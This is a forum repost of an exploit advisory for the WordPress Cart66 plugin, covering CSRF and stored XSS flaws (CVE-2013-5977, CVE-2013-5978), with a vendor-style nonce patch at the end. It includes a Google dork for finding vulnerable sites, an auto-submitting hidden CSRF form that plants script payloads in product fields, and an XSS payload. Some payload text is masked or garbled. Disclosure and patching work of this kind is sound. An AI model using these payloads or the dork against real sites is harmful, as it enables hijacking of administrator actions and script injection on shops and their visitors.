Wordpress Cart66 Plugin - Multiple Vulnerabilities


Özel Üye
31 Ocak 2013
# Exploit Title:**** Wordpress Cart66 Plugin Multiple Vulnerabilities
# Exploit Author:*** absane
# Blog:************* http://blog.noobroot.com
# Discovery date:*** September 29th 2013
# Vendor notified:** September 29th 2013
# Vendor fixed:***** October 2 2013
# Vendor Homepage:** http://cart66.com
# Software Link:**** http://downloads.wordpress.org/plugin/cart66-lite.
# Tested on:******** Wordpress 3.6.1
# Google-dork:****** inurl:/wp-content/plugins/cart66
# CVE (CSRF):******* CVE-2013-5977
# CVE (XSS):******** CVE-2013-5978
Two vulnerabilities were discovered in the Wordpress plugin Cart66 version
2) XSS (Stored)
*** CSRF ***
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products
If the Wordpress admin were logged in and clicked on a link hosting code similar to the one in the PoC, then the admin may unknowingly add a product to his site or have an existing product altered. Other possibilities include, but are not limited to, injecting code into a field vulnerable to stored XSS (see the second vulnerability).
Proof of Concept
Host this code on a remote wesbserver different from the Wordpress site that uses Cart66. As an authenticated Wordpress admin user visit the page and add what you will to the fields. A new product is added. In a live attack, the fields will be hidden, prefilled, and some javascript code will auto submit the fields.
<form name="csrf_form" action="" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name='product[name]' id='product-name' value='**********alert("pwned")</script>' />
<input type='hidden' name='product[item_number]' id='product-item_number' value='1337' />
<input type='hidden' id="product-price" name='product[price]' value='13.37' />
<input type='hidden' id="product-price_description" name='product[price_description]' value='**********alert(";)")</script>' />
<input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' />
<input type="hidden" id="product-min_price" name='product[min_price]' value='' />
<input type="hidden" id="product-max_price" name='product[max_price]' value='' /> 
<input type='hidden' id="product-taxable" name='product[taxable]' value='0'>
<input type='hidden' id="product-shipped" name='product[shipped]' value='1'>
<input type="hidden" id="product-weight" name="product[weight]" value=""* />
<input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' />
<input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' />
<script type="text/javascript">********.csrf_form.submit();</script>
*** Stored XSS* ***
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields:
* Product name
* Price description
Proof of Concept
In the vulnerable fields add **********alert(0)</script> 
The product name XSS vuln is particiularly dangerous because an attacker can use the CSRF vulnerability to add a product whose name is a malicious script. All the admin user needs to do is view the product to be attacked.
Grab the latest update! Or... 
In products.php, replace the line:
In products.php, replace the following:
<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
**<input type="hidden" name="cart66-action" value="save product" />
**<input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
**<div id="widgets-left" style="margin-right: 50px;">
****<div id="available-widgets">
<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
**<input type="hidden" name="cart66_product_nonce" value="<?php echo wp_create_nonce('cart66_product_nonce'); ?>" />
**<input type="hidden" name="cart66-action" value="save product" />
**<input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
**<div id="widgets-left" style="margin-right: 50px;">
****<div id="available-widgets">
And, in Cart66Product.php replace the validate() function with:
**public function validate() {
****$errors = array();
****if(!wp_verify_nonce($_POST['cart66_product_nonce'], 'cart66_product_nonce')) {
******$errors['nonce'] = __("An unkown error occured, please try again later","cart66");
****else {
******// Verify that the item number is present
******if(empty($this->item_number)) {
********$errors['item_number'] = __("Item number is required","cart66");
******if(empty($this->spreedlySubscriptionId))* {
********$this->spreedlySubscriptionId = 0;
******// Verify that no other products have the same item number
******if(empty($errors)) {
********$sql = "SELECT count(*) from $this->_tableName where item_number = %s and id != %d";
********$sql = $this->_db->prepare($sql, $this->item_number, $this->id);
********$count = $this->_db->get_var($sql);
********if($count > 0) {
**********$errors['item_number'] = __("The item number must be unique","cart66");
******// Verify that if the product has been saved and there is a download path that there is a file located at the path
******if(!empty($this->download_path)) {
********$dir = Cart66Setting::getValue('product_folder');
********if(!file_exists($dir . DIRECTORY_SEPARATOR . $this->download_path)) {
**********$errors['download_file'] = __("There is no file available at the download path:","cart66") . " " . $this->download_path;
****return $errors;

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.